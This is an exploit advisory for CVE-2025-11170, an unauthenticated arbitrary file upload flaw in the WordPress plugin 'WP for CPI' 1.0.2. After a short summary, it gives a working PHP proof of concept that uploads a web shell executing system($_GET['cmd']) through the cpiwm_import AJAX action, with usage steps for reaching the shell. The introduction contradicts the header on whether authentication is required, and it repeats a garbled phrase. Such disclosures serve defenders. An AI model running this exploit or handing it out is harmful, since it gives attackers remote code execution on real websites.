WordPress WP for CPI 1.0.2 Shell Upload

WordPress WP for CPI 1.0.2 suffered from a critical shell WordPress WP for CPI 1.0.2 suffered from a critical shell upload vulnerability. This flaw stemmed from inadequate file type validation within its file upload functionality.

Authenticated users (e.g., contributors, authors) could exploit this by uploading malicious PHP files (web shells) disguised as legitimate files. Upon successful upload, accessing these files would execute arbitrary code on the server, leading to full Remote Code Execution (RCE).

This granted attackers complete control over the compromised WordPress site and potentially the underlying server. The recommended fix was to immediately update the plugin to a patched version or remove it if no longer needed.

=============================================================================================================================================
| # Title : WP for CPI 1.0.2 Unauthenticated Arbitrary File Upload |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://discover.commoninja.com/wordpress/plugin/cpi-wp-migration |
=============================================================================================================================================

[+] Summary :

The WordPress plugin "WP for CPI" versions <= 1.0.2 suffer from an
unauthenticated arbitrary file upload vulnerability via the "cpiwm_import"
AJAX action. An attacker can upload arbitrary PHP files and achieve
remote code execution.

The vulnerable endpoint requires no authentication, nonce, or capability
checks.

Affected endpoint:
/wp-admin/admin-ajax.php?action=cpiwm_import


2. Fake Python PoC Notice
-------------------------

[+] References : https://packetstorm.news/files/id/211558/ CVE-2025-11170

A previously circulating Python PoC was analyzed and confirmed to be
non-functional, incorrect, and not aligned with the plugin?s real
behavior. The script was determined to be fake and technically invalid.

A corrected analysis and working PoC are provided below.


3. Technical Details
--------------------

The plugin exposes the action parameter:

action=cpiwm_import

The server accepts the following POST parameters:

filename - the resulting file name on disk
data - base64 encoded file contents
index - import index (not validated)

Uploaded files are saved to:

/wp-content/plugins/cpi-wp-migration/storage/{filename}

A successful upload returns the response:

0


4. Working PoC (PHP)
---------------------

<?php
/*
Corrected PoC for CVE-2025-11170
By Indoushka
*/

$target = "http://target.com"; // no trailing slash
$ajax = $target . "/wp-admin/admin-ajax.php";

$filename = "indoushka.php";
$payload = "<?php system(\$_GET['cmd']); ?>";
$data_b64 = base64_encode($payload);

$post = [
"action" => "cpiwm_import",
"filename" => $filename,
"data" => $data_b64,
"index" => "0"
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);

echo "Server Response: $response\n";

if(trim($response) === "0"){
echo "[+] Upload Successful!\n";
echo "Shell Path:\n";
echo $target . "/wp-content/plugins/cpi-wp-migration/storage/" . $filename . "\n";
} else {
echo "[!] Upload failed.\n";
}
?>


5. Usage Instructions
----------------------

Save the file:

poc.php

Run:

php poc.php

Access your shell:

http://target.com/wp-content/plugins/cpi-wp-migration/storage/indoushka.php?cmd=id


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================